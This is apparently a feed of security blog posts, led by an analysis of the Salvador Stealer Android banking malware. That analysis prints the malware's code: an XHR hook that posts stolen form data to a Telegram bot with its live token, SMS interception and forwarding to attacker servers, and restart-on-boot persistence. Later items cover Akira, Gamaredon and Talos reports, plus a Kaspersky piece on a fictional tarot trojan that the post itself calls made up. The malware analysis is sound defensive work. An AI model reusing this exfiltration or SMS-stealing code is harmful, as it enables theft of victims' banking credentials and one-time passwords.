Salvador Stealer: New Android Malware That Phishes Banking Details & OTPs

In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. During the analysis, we came across internal references to “Salvador,” so we decided to name it Salvador Stealer. 

Real-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app providers. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data, highlighting the need for dynamic malware analysis solutions. 

Salvador Stealer Overview 

The collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking app. Its primary goal is to collect sensitive user information, including: 

  • Registered mobile number 
  • Aadhaar number 
  • PAN card details 
  • Date of birth 
  • Net banking user ID and password 

It embeds a phishing website inside the Android application to trick users into entering their credentials. Once submitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram. 

In this technical breakdown, we’ll walk you through how this malware operates, how it maintains persistence, and how it exfiltrates sensitive data in real time. 

Key Takeaways 

  • Multi-Stage Attack Chain: Salvador Stealer uses a two-stage infection process — a dropper APK that installs and launches the actual banking stealer payload. 
  • Phishing-Based Credential Theft: The malware embeds a phishing website within the Android app to collect sensitive personal and banking information, including Aadhaar number, PAN card, and net banking credentials. 
  • Real-Time Data Exfiltration: Stolen credentials are immediately sent to both a phishing server and a Command and Control (C2) server via Telegram Bot API
  • SMS Interception & OTP Theft: Salvador Stealer abuses SMS permissions to capture incoming OTPs and banking verification codes, helping attackers bypass two-factor authentication. 
  • Multiple Exfiltration Channels: The malware forwards stolen SMS data via dynamic SMS forwarding and HTTP POST requests, ensuring data reaches the attacker even if one channel fails. 
  • Persistence Mechanisms: Salvador Stealer automatically restarts itself if stopped and survives device reboots by registering system-level broadcast receivers. 
  • Exposed Infrastructure: During analysis, we found the phishing infrastructure and admin panel publicly accessible, exposing an attacker’s WhatsApp contact, suggesting a possible link to India. 

Malware Behavior Analysis 

To uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample inside ANY.RUN’s new Android sandbox.

View the full analysis session 

Analysis of the Salvador malware inside ANY.RUN Sandbox’s interactive Android VM

This interactive environment allowed us to quickly analyze the malware’s behavior, visualize its activity, and identify key indicators, all while saving significant analysis time. 

Submit suspicious files and URLs to ANY.RUN Sandbox
to identify threats targeting your company 



Get 14-day free trial


Malware Structure 

The malware consists of two key components: 

  • Dropper APK – Installs and triggers the second-stage payload. 
  • Base.apk (Payload) – The actual banking credential stealer responsible for data theft. 

Dropper APK Behavior 

The dropper APK is designed to silently install and execute the malicious payload. To enable this, it declares specific permissions and intent filters in its AndroidManifest.xml, including: 

AndroidManifest.xml
<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/> 

And

<intent-filter>

<action android:name="com.example.android.apis.content.SESSION_API_PACKAGE_INSTALLED" android:exported="true"/>

</intent-filter>

This behavior was clearly observed in our sandbox environment, where the malware launched a new activity immediately after execution. 

The dropper APK designed to install and launch a secondary payload (base.apk) as a new activity

If we open the initial dropper APK using WinRAR, we can see base.apk, which serves as the actual malicious payload. The dropper APK is responsible for dropping and launching this payload without the victim’s knowledge. 

Base.apk displayed inside the initial dropper APK using WinRAR

Once executed, base.apk exhibits several key behaviors: 

  • It establishes a connection to Telegram, which the attackers use as a Command and Control (C2) server to receive stolen data and manage the infection. 
  • It triggers the signature “Starts itself from another location,” confirming that it was dropped and launched by the initial dropper APK rather than being installed directly. 
Process communicating with Telegram revealed inside ANY.RUN Android sandbox

Phishing Interface & Data Theft  

The Salvador Stealer tricks users into entering their banking credentials through a fake banking interface phishing page embedded in the app. 

Once the user submits their credentials, the data is immediately sent to both the C2 server and a Telegram bot. 

Step 1: Collecting Personal Information

On the first page, the app prompts the user to enter: 

  • Registered mobile number 
  • Aadhaar number 
  • PAN card details 
  • Date of birth 
The interface of the fake banking app displayed inside ANY.RUN Android sandbox 

Once this information is submitted, it is immediately sent to: 

  • A phishing website controlled by the attacker 
Stolen data sent to phishing site 
  • A Telegram bot used as part of the malware’s C2 infrastructure 
Stolen data sent to Telegram C2 server 

Step 2: Stealing Banking Credentials 

On the next stage, the app asks the user to provide: 

  • Net banking user ID 
  • Password 
Banking credentials provided to cyber attackers 

This data is also exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside ANY.RUN Android sandbox:  

Stolen data sent to phishing site

These credential theft attempts were clearly captured in the HTTP request logs during sandbox analysis.

Stolen data sent to Telegram C2 server

By enabling HTTPS MITM Proxy mode in ANY.RUN’s Android sandbox, we were able to intercept and verify the exfiltration of user data in real time. 

Credential theft attempts captured in the HTTP request logs

Don’t risk your company’s systems,
open suspicious files and URLs inside ANY.RUN Sandbox 



Sign up with business email


Technical Analysis 

The base.apk file embedded in the dropper APK contains the core malicious functionality of Salvador Stealer. Here’s a detailed look at its structure  
 

Base.apk file structure

Encrypted Strings & Obfuscation 

We’ll begin by opening one of the Java files to analyze its contents. Let’s start with Earnestine.java.

public class Earnestine extends BroadcastReceiver { 

    private static final Map<String, StringBuilder> sdghedy = new ConcurrentHashMap(); 

 

    @Override // android.content.BroadcastReceiver 

    public void onReceive(Context context, Intent intent) { 

        Object[] pdus; 

        if (intent.getAction().equals(NPStringFog.decode("0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C3D3D3E3E3C2424203B383529")) && (pdus = (Object[]) intent.getExtras().get(NPStringFog.decode("1E141812"))) != null) { 

            for (Object pdu : pdus) { 

...  

We can see that the strings are encrypted using a custom method. The decryption is performed using NPStringFog.decode(…), defined in the NPStringFog.java class.  

Let’s examine that next to understand what type of encryption is used. 

Opening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: “npmanager”. 

package obfuse; 
 
import java.io.ByteArrayOutputStream; 
 
public class NPStringFog { 
    public static String KEY = "npmanager";  // XOR key 
    private static final String hexString = "0123456789ABCDEF";  // Hexadecimal string for conversion 
 
    public static String decode(String str) { 
        ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2); 
         
        // Convert hex string to byte array 
        for (int i = 0; i < str.length(); i += 2) { 
            baos.write((hexString.indexOf(str.charAt(i)) << 4) | hexString.indexOf(str.charAt(i + 1))); 
        } 
         
        byte[] b = baos.toByteArray(); 
        int len = b.length; 
        int keyLen = KEY.length(); 
         
        // XOR decryption 
        for (int i2 = 0; i2 < len; i2++) { 
            b[i2] = (byte) (b[i2] ^ KEY.charAt(i2 % keyLen));  // XOR byte with key 
        } 
         
        return new String(b); 
    } 
} 

This confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one found in Earnestine: 

Decoding strings with the help of CyberChef 

Cyberchef rule:

https%3A%2F%2Fgchq.github.io%2FCyberChef%2F%23recipe%3DFrom_Hex%28%27Auto%27%29XOR%28%257B%27option%27%3A%27Latin1%27%2C%27string%27%3A%27npmanager%27%257D%2C%27Standard%27%2Cfalse%29%26input%3DMEYxRTA5MTMwMTA4MDM0QjAyMUMxRjFCMDgwQTA0MTU0QjI2MEIxQzA4MTEwNjBFMDkxQzVDM0QzRDNFM0UzQzI0MjQyMDNCMzgzNTI5

To analyze the rest of the APK effectively, we’ll need to decode all encrypted strings automatically. Here’s a Python script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method, and writes the result to a _decoded.java file.

import re 
import os 
 
def decode_npstringfog(encoded: str, key: str = "npmanager") -> str: 
    b = bytearray() 
    for i in range(0, len(encoded), 2): 
        b.append(int(encoded[i:i+2], 16)) 
    key_bytes = key.encode() 
    return bytearray((b[i] ^ key_bytes[i % len(key_bytes)]) for i in range(len(b))).decode(errors="replace") 
 
def decode_and_save(filepath: str): 
    with open(filepath, "r", encoding="utf-8") as f: 
        content = f.read() 
 
    # Find all NPStringFog.decode("...") 
    pattern = re.compile(r'NPStringFog.decode("([0-9A-F]+)")') 
    if not pattern.search(content): 
        return 
 
    decoded_content = pattern.sub(lambda m: f'"{decode_npstringfog(m.group(1))}"', content) 
 
    outpath = filepath.replace(".java", "_decoded.java") 
    with open(outpath, "w", encoding="utf-8") as f: 
        f.write(decoded_content) 
    print(f"[+] Decoded file written: {outpath}") 
 
def walk_and_decode(base_dir: str = "."): 
    for root, _, files in os.walk(base_dir): 
        for file in files: 
            if file.endswith(".java"): 
                full_path = os.path.join(root, file) 
                decode_and_save(full_path) 
 
walk_and_decode() 

WebView-Based Phishing Page 

Now that we’ve decoded the files, we can begin our deeper analysis of base.apk.  

Let’s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles runtime permissions. 
 
Upon launch, it checks for the necessary Android permissions and ensures there is an active internet connection. 

@Override 

public void onCreate(Bundle savedInstanceState) { 

    super.onCreate(savedInstanceState); 

    setContentView(R.layout.activity_ffff); 

    changeStatusBarColor("#4CAF50"); 

    ... 

    if (checkPermissions(this)) { 

        WebView webView = (WebView) findViewById(R.id.randomWebView); 

        setupWebView(this, webView); 

        initiateForegroundServiceIfRequired(); 

    } else { 

        requestAppPermissions(); 

    } 

} 

This method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables JavaScript and DOM storage, then loads the phishing page:

public void setupWebView(Context context, final WebView webView) { 

    WebSettings settings = webView.getSettings(); 

    settings.setJavaScriptEnabled(true); 

    settings.setDomStorageEnabled(true); 

    ... 

    webView.loadUrl("https://t15.muletipushpa.cloud/page/"); 

} 

Once the page finishes loading, a malicious JavaScript payload is injected: 

String jsCode = "eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));"; 

After decoding, the JavaScript reveals that it hooks into  XMLHttpRequest.prototype.send, which is commonly used by web apps to send data (e.g., login credentials or session info). 

(function() { 

    const originalSend = XMLHttpRequest.prototype.send; 

    XMLHttpRequest.prototype.send = function(data) { 

        try { 

            const botToken = "7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE"; 

            const chatId = "-1002480016557"; 

            const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`; 

            const telegramMessage = { 

                chat_id: chatId, 

                text: `Intercepted Data Sent:n${data}` 

            }; 

            fetch(telegramUrl, { 

                method: 'POST', 

                headers: { 

                    'Content-Type': 'application/json' 

                }, 

                body: JSON.stringify(telegramMessage) 

            }); 

        } catch (e) { 

            console.error("Error sending to Telegram:", e); 

        } 

        return originalSend.apply(this, arguments); 

    }; 

})();

It intercepts all AJAX/XHR requests made from the loaded phishing page. These intercepted payloads are sent to a hardcoded Telegram chat via the Bot API. 


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



SMS Interception & OTP Theft 

After loading the phishing WebView it requests several Android permissions, including:  

  • RECEIVE_SMS 
  • SEND_SMS 
  • READ_SMS 
  • INTERNET  

These permissions are essential for the malware’s goals—intercepting one-time passwords (OTPs) and forwarding them. 

Once the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the Fitzgerald service. 
This foreground service creates a fake notification (“Customer support”) and more importantly, it immediately registers a broadcast receiver to intercept incoming SMS: 

this.smsReceiver = new Earnestine(); 

registerReceiver(this.smsReceiver, new IntentFilter("android.provider.Telephony.SMS_RECEIVED")); 

This is the real starting point of the OTP interception process. Every incoming message is captured and parsed by Earnestine. From the PDU, the malware extracts the message body, sender’s number, and timestamp: 

SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu, "3gpp"); 

String messageBody = sms.getMessageBody(); 

String senderId = sms.getOriginatingAddress(); 

long timestamp = sms.getTimestampMillis();

Data Exfiltration Methods

The message is then stored using a map that groups multipart SMS messages together. Once it decides the message is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the attacker: 

  1. Dynamic SMS forwarding:  

Inside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number. 

String urlString = "https://t15.muletipushpa.cloud/json/number.php"; 

... 

String phoneNumber = jsonObject.optString("number", ""); 

Earnestine.this.sendSMS(messageBody, phoneNumber); 

This number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the message is forwarded to that number using the standard SmsManager. 

smsManager.sendTextMessage(phoneNumber, null, messageBody, null, null); 

If the number is not available or the response is malformed, the malware will fall back to a previously saved one stored in SharedPreferences. It uses the key “Salvador” as the name of the preference file, and “forwardingNumber” as the key to retrieve the last known destination.  

This use of “Salvador” as a unique identifier for internal storage is what led us to name this malware Salvador Stealer: 

SharedPreferences sharedPreferences = context.getSharedPreferences("Salvador", 0); 

String savedPhoneNumber = sharedPreferences.getString("forwardingNumber", ""); 

This suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it to continue exfiltrating OTPs even when the server is unreachable or temporarily offline. 

  1. HTTP-Based Fallback 

Through another method called Randall(), the malware constructs a JSON payload containing the sender ID, message content, and timestamp: 

jsonData.put("sender_id", senderId); 

jsonData.put("message", messageBody); 

jsonData.put("timestamp", timestamp); 

This data is then sent in a POST request to another hardcoded endpoint: 

String apiUrl = "https://t15.muletipushpa.cloud/post.php";

By using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably delivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity issues or SMS blocking. 

Persistence Mechanism 

Even if the user or system tries to terminate the app’s background service, the malware is programmed to automatically restart it. When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery task using Android’s WorkManager: 

WorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class) 

    .setInitialDelay(1L, TimeUnit.SECONDS) 

    .build(); 

WorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork); 

The scheduled worker points to the Mauricio class. Inside, it simply relaunches Fitzgerald: 

Intent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class); 

getApplicationContext().startForegroundService(Pasquale); 

This way, even if the user tries to shut the app down from the task manager or system settings, the malware silently revives itself within seconds. 

If the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this behavior. It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again: 

public class Ellsworth extends BroadcastReceiver { 

    @Override 

    public void onReceive(Context context, Intent intent) { 

        if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) { 

            Intent serviceIntent = new Intent(context, (Class<?>) Fitzgerald.class); 

            context.startService(serviceIntent); 

        } 

    } 

} 

This guarantees that the malware regains control after reboot and resumes intercepting SMS messages immediately. 

Interesting Findings 

During our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a phishing websiteembedded inside the Android application. 
 
The phishing page can be accessed directly at: 
👉 hxxxs://t15[.]muletipushpa[.]cloud/page/start[.]php 

Phishing page that encourages victims to share their personal data 

We also detected another phishing page hosted on a different subdomain, following a pattern with incremental digits—from t01.* up to t15.*  

At the time of writing, the attacker has also left the admin panel accessible to anyone. 

The admin login page is publicly available at: 
👉 hxxxs://t15[.]muletipushpa[.]cloud/admin/login[.]php 

Admin login page available to everyone 

Brute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely belonging to the developer of this phishing malware. 

hxxxs://api[.]whatsapp[.]com/send/?phone=916306285085&text&type=phone_number&app_absent=0

Exposed phone number: +916306285085 
This suggests that the attacker is either based in India or using an Indian phone number as a disguise. 

Salvador Threat Impact 

The Salvador Stealer campaign poses a serious risk to both individuals and organizations: 

  • For end users: Victims risk financial fraud, identity theft, and unauthorized access to their banking accounts. 
  • For financial institutions: This malware undermines customer trust, increases fraud cases, and may lead to reputational damage. 
  • For security teams: Salvador Stealer’s layered infection chain, real-time data exfiltration, and SMS interception tactics make detection difficult without advanced analysis tools. 
  • For mobile ecosystem: The use of legitimate-looking banking apps and embedded phishing pages highlights the growing trend of sophisticated Android-based social engineering attacks. 

Conclusion 

The analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and advanced persistence techniques to compromise sensitive financial data. Threats like this highlight the increasing complexity of mobile malware and the growing challenge of detecting and stopping them before damage is done. 

By analyzing Salvador Stealer in real time using ANY.RUN’s Android sandbox, we were able to fully map its behavior, uncover its infrastructure, and extract key indicators in just minutes—something that would otherwise require hours of manual static analysis. 

Here’s how analysis like this can bring value: 

  • Faster threat detection: Quickly identify malicious behaviors and communication patterns. 
  • Complete visibility: Observe real-time actions of mobile malware, including data exfiltration and persistence tactics. 
  • Reduced investigation time: Automate and accelerate the technical analysis process. 
  • Improved response: Provide clear, actionable Indicators of Compromise (IOCs) for threat hunting and incident response. 
  • Enhanced threat intelligence: Expose attacker infrastructure and techniques that may be used in future campaigns. 

Effective defense starts with better visibility. Tools like ANY.RUN’s sandbox make real-time threat analysis actionable and accessible to everyone. 

Try ANY.RUN’s Android Sandbox now 

Indicators of Compromise (IOC) 

🔗 Phishing URL: 

  • t01[.]muletipushpa[.]cloud 
  • t02[.]muletipushpa[.]cloud 
  • t03[.]muletipushpa[.]cloud 
  • t04[.]muletipushpa[.]cloud 
  • t05[.]muletipushpa[.]cloud 
  • t06[.]muletipushpa[.]cloud 
  • t08[.]muletipushpa[.]cloud 
  • t10[.]muletipushpa[.]cloud 
  • t11[.]muletipushpa[.]cloud 
  • t12[.]muletipushpa[.]cloud 
  • t13[.]muletipushpa[.]cloud 
  • t14[.]muletipushpa[.]cloud 
  • t15[.]muletipushpa[.]cloud 
  • ta01[.]muletipushpa[.]cloud 

📡 C2 Server (Telegram Bot): 

  • hxxs://api[.]telegram[.]org/bot7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE 

🔍 File Hashes: 

  • INDUSLND_BANK_E_KYC.apk 

SHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A 

  • Base.apk 
    SHA256:  
    7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8 

Threat actor’s phone number: 

  • +916306285085 

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

The post Salvador Stealer: New Android Malware That Phishes Banking Details & OTPs appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Trojan.Arcanum — a new trojan targeting tarot experts, esotericists, and magicians | Kaspersky official blog

Imagine what the world would be like if tarot cards could accurately predict any and every event. Perhaps we could have nipped Operation Triangulation in the bud, and zero-day vulnerabilities wouldn’t exist at all, as software developers would receive alerts in advance thanks to tarot readings.

Sounds incredible? Well, our experts actually looked into similar methods in their latest discovery! Read on to learn about the new Trojan we found and how we did it.

The tarot trojan

The new Trojan — Trojan.Arcanum — is distributed through websites dedicated to fortune-telling and esoteric practices, disguised as a “magic” app for predicting the future. At first glance, it looks like a harmless program offering users the chance to lay out virtual tarot cards, calculate astrological compatibility, or even “charge an amulet with the energy of the universe” (whatever that means). But in reality, something truly mystical is unfolding behind the scenes — in the worst possible way.

Once installed on the user’s device, Trojan.Arcanum connects to a cloud C2 server and deploys its payload — the Autolycus.Hermes stealer, the Karma.Miner miner, and the Lysander.Scytale crypto-malware. Having collected user data (logins; passwords; time, date and place of birth; banking information; etc.), the stealer sends it to the cloud. Then the real drama begins: the Trojan starts manipulating its victim in real life using social engineering!

Through pop-up notifications, Trojan.Arcanum sends pseudo-esoteric advice to the user, prompting them to take certain actions. For example, if the Trojan gains access to the victim’s banking apps and discovers significant funds in the account, the attackers send a command to give the victim a false prediction about the favorability of large investments. After this, the victim might receive a phishing email offering to participate in a “promising startup”. Or maybe they won’t — depending on how the cards fall.

In the meantime, the embedded Karma.Miner begins mining KARMA tokens, and the Trojan activates a paid subscription to dubious “esoteric practices” with monthly charges. If the user detects and terminates the KARMA mining, the crypto-malware randomly shuffles segments of the user’s files without any chance of recovery.

How we discovered Trojan.Arcanum

Typically, we hunt for cyberthreats using complex algorithms and data analysis. But what if the threat is too enigmatic? In such cases, trusting a tarot reading is the best approach. That’s exactly what our experts did. When performing divination on the signature of an unknown virus detected through KSN (Kaspersky Sacral Network), several Major Arcana cards appeared — some of them reversed:

  1. The Emperor — A symbol of power, control, and strategic foresight. Meaning: the threat is serious.
  2. The Magician — Able to spot vulnerabilities where no one else does. Clever, proactive, and decisive, the Magician skillfully manipulates people. In reverse, it warns of a loss of control. Meaning: the attackers use social engineering.
  3. The Horse — Represents a bold, decisive, adventurous individual; a symbol of activity, change… and Trojan horses. Reversed, the card indicates errors due to impulsive actions. Meaning: the threat might disguise itself as a randomly downloaded harmless app.
  4. The Wheel — Warns that insurmountable circumstances are beyond the user’s control, and that a favorable resolution will be delayed. Usually indicates a miner or financial scam.
  5. The Tower — Foretells a phase of change initiated not by the person but by fate — falling upon the person with relentless force. A strong predictor of a zero-click vulnerability.
  6. Death — represents transformation, a change of cycles, an ending, a transition to a new level. Indicates the presence of crypto-malware.
How the reading looked on the expert's table

How the reading looked on the expert’s table

How to protect yourself from Arcanum

Protecting yourself from such a virus is nearly impossible — if only because it doesn’t exist. This whole story is a fabrication from start to finish. But what’s stopping it from becoming a reality at any given moment? Trojans and other types of malware do often disguise themselves as legitimate apps and can steal all sorts of data. Miners have long been distributed through links under popular YouTube videos or video games. Ransomware is capable of paralyzing an entire nation’s healthcare insurance system. Moreover, magic themes are certainly popular enough to become a potential target of cybercriminals. Here are some tips to make your digital life safer:

Kaspersky official blog – ​Read More

How IP cameras can help attackers | Kaspersky official blog

Cybersecurity professionals will likely draw upon the Akira ransomware attack as a key learning example for years to come. The attackers encrypted an organization’s computers by hacking a surveillance camera. While counterintuitive at first glance, the sequence of events follows a logic that can be easily applied to a different organization and different devices within its infrastructure.

Anatomy of the attack

Attackers exploited a vulnerability in a public-facing application to penetrate the network and execute commands on an infected host. Following the initial breach, they launched the popular remote access tool AnyDesk and initiated an RDP session with the organization’s file server. Accessing the server, they attempted to run ransomware, but the company’s EDR system detected and quarantined it. Alas, this didn’t stop the attackers.

Unable to deploy the ransomware on servers or workstations, which were protected by EDR, the attackers ran a LAN scan and found a network video camera. Despite repeated references to a “webcam” in the incident investigation report, we believe it wasn’t the built-in camera of a laptop or smartphone, but a standalone networked device for video surveillance.

There were several reasons why the camera was an ideal target for the attackers:

  • Due to its severely outdated firmware, the device was vulnerable to remote exploitation, which granted attackers shell access and the ability to execute commands.
  • The camera ran a lightweight Linux build capable of executing standard binaries for this operating system. Coincidentally, Akira’s arsenal contained a Linux-based encryption tool.
  • This specialized device lacked — and likely was incapable of supporting — an EDR agent or any other security controls to detect malicious activity.

The attackers were able to install their malware on the camera, and used the device as the foothold for encrypting the organization’s servers.

How to avoid being next victim

The IP camera incident vividly illustrates certain principles of targeted cyberattacks, and provides insight into effective countermeasures. Here’s a ranking of the countermeasures, from the easiest to the most complex:

  • Limit access to specialized network devices and their permissions. A major factor in this attack was the IP camera’s overly permissive access to the file servers. These devices should reside within an isolated subnet. If that’s not feasible, they should be given the fewest possible permissions to communicate with other computers. For example, write-access should be restricted to a single folder on a single specific server where video recordings are stored. And access to the camera and this folder should be restricted to workstations used only by security and other authorized personnel. While implementing these restrictions may be more challenging for other specialized devices (such as printers), it’s readily achievable with cameras.
  • Deactivate non-essential services and default accounts on smart devices, and change default passwords.
  • Use an EDR solution across all servers, workstations, and other compatible devices. The selected solution must be capable of detecting anomalous server activity, such as remote encryption attempts via SMB.
  • Extend vulnerability and patch management programs to include all smart devices and server software. Start by conducting a detailed inventory of such devices.
  • Where feasible, implement monitoring, such as telemetry forwarding to a SIEM system, even on specialized devices where EDR deployment isn’t possible: routers, firewalls, printers, video surveillance cameras, and similar devices.
  • Consider transition to XDR-class solution, which combines network and host monitoring with anomaly-detection technologies, and tools for manual and automatic incident response.

Kaspersky official blog – ​Read More

Beers with Talos: Year in Review episode

Beers with Talos: Year in Review episode

Joe, Hazel, Bill and Dave break down Talos’ Year in Review 2024 and discuss how and why cybercriminals have been leaning so heavily on attacks that are routed in stealth in simplicity.

The team also provide insights into some of the topics of the report, including the top-targeted vulnerabilities of the year, network-based attacks, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. 

Listen below:

For the full report, head to blog.talosintelligence.com/2024yearinreview

Cisco Talos Blog – ​Read More

Available now: 2024 Year in Review

Available now: 2024 Year in Review

Welcome to Cisco Talos’ 2024 Year in Review, available for download now. This report is powered by threat telemetry from over 46 million global devices across 193 countries and regions, amounting to more than 886 billion security events per day.  

Explore key insights in topics including the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. With Talos’ informed analysis and recommendations, you can strategically prioritize your defenses to stay ahead in 2025. 

 

Available now: 2024 Year in Review

Read the 2024 Cisco Talos Year in Review

Download now

 

2024’s Threat Actor Playbook: Stealth and Simplicity 

This year, cybercriminals leaned heavily on stealth and efficiency, favoring straightforward techniques over complex malware and zero-day exploits. Here’s more that stood out: 

  • Identity-based attacks were particularly noteworthy, accounting for 60% of Cisco Talos Incident Response cases. 
  • Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors. 
  • Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of cases. They also targeted education entities more than any other sector in 2024, a trend in line with previous years.  
  • Based on Cisco Duo data, identity and access management (IAM) applications were most frequently targeted in MFA attacks, accounting for nearly a quarter of related incidents.  
  • Threat actor use of AI and machine learning largely fell short of industry projections, with actors relying on these technologies to enhance their techniques rather than aid in the creation of new ones. 

Want some quick insights? Here’s a two-minute overview of key findings: 

Stay informed 

Download Talos’ 2024 Year in Review today, and bookmark our landing page to access forthcoming exclusive interviews with Talos experts, videos, podcasts and more. 

Cisco Talos Blog – ​Read More

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

  • Cisco Talos is actively tracking an ongoing campaign targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader, since at least November 2024. 
  • The file names use Russian words related to the movement of troops in Ukraine as a lure. 
  • The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second stage Zip file containing the Remcos backdoor. 
  • The second stage payload uses DLL side loading to execute the Remcos payload. 
  • Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group. 
Gamaredon campaign abuses LNK files to distribute Remcos backdoor

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

 

Phishing campaign using the invasion of Ukraine as a theme 

The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion.  

Although Talos was not able to pinpoint the exact method by which these files are distributed, it is likely that Gamaredon continues to send phishing e-mails with either the ZIP file directly attached to it or containing a URL link to download the file from a remote host.  

Below are some examples of file names used in this campaign: 

Original Name 

Translation 

3079807576 (Шашило О.В)/ШАШИЛО Олександр Віталійович.docx.lnk 

3079807576 (Shashilo O.V)/SHASHILO Oleksandr Vitaliyovich.docx.lnk 

3151721177 (Рибак С.В)/РИБАК Станіслав Вікторович.docx.lnk 

3151721177 (Rybak S.V)/RYBAK Stanislav Viktorovich.docx.lnk 

3407607951 (Жолоб В.В)/ЖОЛОБ Владислав Вікторович.docx.lnk 

3407607951 (Zholob V.V)/ZHOLOB Vladislav Viktorovich.docx.lnk 

3710407173 (Гур’єв П.А)/ГУР’ЄВ Павло Андрійович.docx.lnk 

3710407173 (Gur’ev P.A)/GUR’EV Pavlo Andriyovich.docx.lnk 

Вероятное расположение узлов связи, установок РЭБ и расчетов БПЛА противника. ЮГ КРАСНОАРМЕЙСКА.docx.lnk 

Probable location of communication nodes, electronic warfare installations and enemy UAV calculations. SOUTH OF THE RED ARMY.docx.lnk 

ГУР’ЄВ Павло Андрійович.docx.lnk 

GUR’EV Pavlo Andriyevich.docx.lnk 

Координаты взлетов противника за 8 дней (Красноармейск).xlsx.lnk 

Coordinates of enemy takeoffs for 8 days (Krasnoarmeysk).xlsx.lnk 

Позиции противника запад и юго-запад.xlsx.lnk 

Positions of the enemy west and southwest.xlsx.lnk 

РИБАК Станіслав Вікторович.docx.lnk 

RYBAK Stanislav Viktorovich.docx.lnk 

ШАШИЛО Олександр Віталійович.docx.lnk 

SHASHILO Oleksandr Vitaliyevich.docx.lnk 

The translation for these names shows the intent of this campaign in using a war-related theme. We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements in the region of conflict. 

These files contain metadata indicating only two machines were used in creating the malicious shortcut files. As we mentioned in a previous blog Gamaredon tends to use a short list of machines when creating the LNK files for their campaigns and the ones used in this campaign were previously seen by Talos in incidents related to this threat group. 

The LNK files contain PowerShell code used to download and execute the next stage payload, as well as a decoy file which is shown to the user after the infection occurs as a way to disguise the compromise.  

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

The PowerShell code uses the cmdlet Get-Command to indirectly execute the functions to download and execute the payload, which could be an attempt to bypass string-based detection by antivirus solutions.  

The servers used in this campaign are based out of Germany and Russia, and at the time of our assessment, all of them return HTTP error 403 when attempting to download the payload files.  

That indicates that either the files were taken offline, or access to the file is being restricted. Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine. We have found evidence in public sample databases that these servers were still hosting the files for specific regions while returning access denied errors in our tests, like this sample available in the “Any.run” public sandbox: 

Network infrastructure associated with Campaign 

The servers used in this campaign are mostly hosted in two Internet Service Providers (ISP): GTHost and HyperHosting: 

IP 

ASN 

ISP 

146[.]185[.]233[.]96 

63023 

gthost 

146[.]185[.]233[.]101 

63023 

gthost 

146[.]185[.]239[.]45 

63023 

gthost 

80[.]66[.]79[.]91 

60602 

hyperhosting 

80[.]66[.]79[.]195 

60602 

hyperhosting 

81[.]19[.]131[.]95 

63023 

ispipoceanllc 

80[.]66[.]79[.]159 

60602 

hyperhosting 

80[.]66[.]79[.]200 

60602 

hyperhosting 

80[.]66[.]79[.]155 

60602 

hyperhosting 

146[.]185[.]239[.]51 

63023 

gthost 

146[.]185[.]233[.]90 

63023 

